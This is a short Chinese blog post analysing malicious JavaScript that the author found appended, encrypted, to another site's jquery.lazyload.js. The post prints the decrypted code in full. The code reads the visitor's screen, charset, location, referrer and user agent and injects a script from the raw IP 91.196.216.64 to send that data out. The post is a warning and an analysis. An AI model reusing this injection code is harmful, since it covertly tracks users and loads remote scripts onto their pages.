Louis Han童鞋应该是中招了 » 荒野无灯weblog

Keep It Simple, Stupid.

荒野无灯weblog

Louis Han童鞋应该是中招了

昨天刚有人发个php恶意代码给我要我分析,今天又发现js恶意代码了。。。
今天在找一个用jquery.lazyload.js的网站,就到了Louis Han看了下。
结果发现它的这个js文件后面居然还附加了一段加密js代码,解密后如下:

element=document[getElementById](sc_co)
if(!element){cls=screen[colorDepth]
sw=screen[width]
sh=screen[height]
dc=document[charset]
lc=document[location]
refurl=escape(document[referrer])
ua=escape(navigator[userAgent])
var js=document[createElement](script)
js[id]=sc_co
js[src]=http://91.196.216.64/s.php?ref=+refurl+&cls=+cls+&sw=+sw+&sh=+sh+&dc=+dc+&lc=+lc+&ua=+ua
var head=document[getElementsByTagName](head)[0]
head[appendChild](js)
} 

src大概如下:


http://91.196.216.64/s.php?ref=&cls=32&sw=1366&sh=768&dc=gb2312&lc=file:///C:/Users/HuangYe/Downloads/jquery-image-lazy-loading/a.html&ua=Mozilla/5.0%20%28compatible%3B%20MSIE%209.0%3B%20Windows%20NT%206.1%3B%20Trident/5.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20Tablet%20PC%202.0%3B%20.NET4.0C%3B%20.NET4.0E%29

可见这个是用来偷偷收集用户信息的,用script的src只是为了让用户浏览器自动发送一个http请求用querystring把相关信息提交过去。

解密js代码来自这儿

Tagged in :

All Comments (0)
Gravatar image
No Comments